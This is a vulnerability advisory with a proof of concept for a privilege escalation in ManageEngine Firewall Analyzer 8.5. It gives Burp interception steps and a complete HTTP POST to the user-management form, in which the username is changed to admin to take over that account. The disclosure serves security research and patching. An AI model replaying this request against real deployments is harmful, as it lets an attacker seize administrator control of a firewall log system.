ManageEngine Firewall Analyzer 8.5– Privilege Escalation Vulnerability
================================================================
ManageEngine Firewall Analyzer 8.5– Privilege Escalation Vulnerability
================================================================
Information
------------------------------------------------
Vulnerability Type : Privilege Escalation Vulnerability
Vulnerable Version : 8.5
Vendor Homepage:
https://www.manageengine.com/products/firewall/download.html
CVE-ID :
Severity : High
Author – Sachin Wagh (@tiger_tigerboy)
Description
------------------------------------------------
ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software that helps network administrators to centrally collect,
archive, analyze their security device logs and generate forensic reports out of it.
It allows an attacker to gain admin privileges.
Proof of Concept URL
--------------------
1. Setup Burp and change user password and change username to admin.
2. Burp Request :
POST /fw/userManagementForm.do HTTP/1.1
Host: localhost:8500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost:8500/fw/index2.do?url=archivedFiles&helpP=archivedFiles&completeData=true&tab=system&subTab=cal&flushCache=true&DateRange=false&timeFrame=LastWeek
Cookie: leftPanel=230px; JSESSIONID=E58D08B4F3AF70279BBB128D713EADB7; JSESSIONIDSSO=A326C72CC526B521A8EA9286C7951F0C; FWA_TABLE=TS
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
password=guest&email=guest%40adventnet.com&addField=false&userName=guest&userID=2&changePassword=true&isDemo=false&domainName=&productName=firewall&next=logoff
Affected Product:
------------------------------------------------
Vulnerable Product:
[+] ManageEngine Firewall Analyzer 8.5
Credits & Authors
------------------------------------------------
Sachin Wagh (@tiger_tigerboy)
Thanks
New to ADSelfService Plus?